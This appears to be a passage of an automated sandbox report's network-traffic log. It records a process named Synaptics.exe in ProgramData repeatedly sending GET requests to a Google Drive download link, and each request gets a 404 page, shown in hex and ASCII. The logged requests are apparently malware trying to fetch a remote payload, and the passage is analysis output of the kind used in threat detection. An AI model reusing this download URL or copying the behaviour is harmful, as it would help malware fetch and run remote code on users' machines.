                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  9192.168.2.349750172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  0192.168.2.349736172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:15 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:15 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:15 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:15 UTC1INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 78 34 78 4a 54 5a 42 6a 61 36 31 6b 59 5f 5f 45 63 34 54 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fx4xJTZBja61kY__Ec4T6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:15 UTC3INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:15 UTC3INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  1192.168.2.349737172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:15 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:15 UTC3INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:15 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:15 UTC4INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 44 49 61 4d 72 59 43 47 79 32 42 69 79 74 71 52 2d 5a 51 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WDIaMrYCGy2BiytqR-ZQ7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:15 UTC6INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:15 UTC6INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  10192.168.2.349751172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:20 UTC28OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:21 UTC31INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:21 UTC32INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 4c 71 6a 4c 41 77 6e 55 54 57 56 62 6d 77 43 52 33 6d 34 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xLqjLAwnUTWVbmwCR3m4Dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:21 UTC34INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:21 UTC34INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  11192.168.2.349752172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:21 UTC34OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:21 UTC34INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:21 UTC36INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 6e 66 69 49 67 34 52 36 55 5f 4d 31 64 77 4c 54 77 37 46 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9nfiIg4R6U_M1dwLTw7FyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:21 UTC37INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:21 UTC37INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  12192.168.2.349753172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:21 UTC34OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:21 UTC37INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:21 UTC39INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 4f 48 50 6a 66 36 79 39 4e 59 33 48 56 56 2d 70 62 67 69 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2OHPjf6y9NY3HVV-pbgiUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:21 UTC40INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:21 UTC40INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  13192.168.2.349754172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:21 UTC37OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:21 UTC41INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
